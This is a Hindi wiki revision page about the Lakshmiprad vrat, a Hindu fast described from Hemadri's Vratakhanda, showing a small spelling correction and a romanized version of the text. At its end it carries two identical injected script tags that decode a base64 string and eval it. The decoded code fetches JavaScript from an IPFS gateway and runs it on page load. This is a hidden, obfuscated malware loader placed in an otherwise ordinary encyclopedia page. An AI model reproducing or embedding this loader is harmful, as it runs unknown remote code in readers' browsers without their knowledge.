Difference between revisions of "लक्ष्मीप्रद व्रत"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - " {{लेख प्रगति |आधार=आधार1 |प्रारम्भिक= |माध्यमिक= |पूर्णता= |शोध= }}" to "")
m (Text replace - "उल्लखित" to "उल्लिखित")
Line 1: Line 1:
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।
+
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लिखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।
 
*हेमाद्रि <ref>(हेमाद्रि व्रत खण्ड 2, 769-771)</ref> में यह कृच्छव्रतों में परिगणित है।
 
*हेमाद्रि <ref>(हेमाद्रि व्रत खण्ड 2, 769-771)</ref> में यह कृच्छव्रतों में परिगणित है।
 
*[[कार्तिक]] [[कृष्ण पक्ष]] की [[सप्तमी]] से [[दशमी]] तक क्रम से [[दूध]], बिल्ब दलों, [[कमल|कमलों]] एवं कमल के रेशों का सेवन तथा [[एकादशी]] पर उपवास रखना चाहिए।
 
*[[कार्तिक]] [[कृष्ण पक्ष]] की [[सप्तमी]] से [[दशमी]] तक क्रम से [[दूध]], बिल्ब दलों, [[कमल|कमलों]] एवं कमल के रेशों का सेवन तथा [[एकादशी]] पर उपवास रखना चाहिए।

Revision as of 18:41, 25 February 2011

  • bharat mean dharmik vratoan ka sarvavyapi prachar raha hai. yah hindoo dharm granthoan mean ullikhit hindoo dharm ka ek vrat sanskar hai.
  • hemadri [1] mean yah krichchhavratoan mean pariganit hai.
  • kartik krishna paksh ki saptami se dashami tak kram se doodh, bilb daloan, kamaloan evan kamal ke reshoan ka sevan tatha ekadashi par upavas rakhana chahie.
  • in dinoan mean keshav pooja ki jati hai.
  • aisi manyata hai ki vishnulok ki prapti hoti hai.[2]

tika tippani aur sandarbh

  1. (hemadri vrat khand 2, 769-771)
  2. hemadri (vratakhand 2, 770)

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>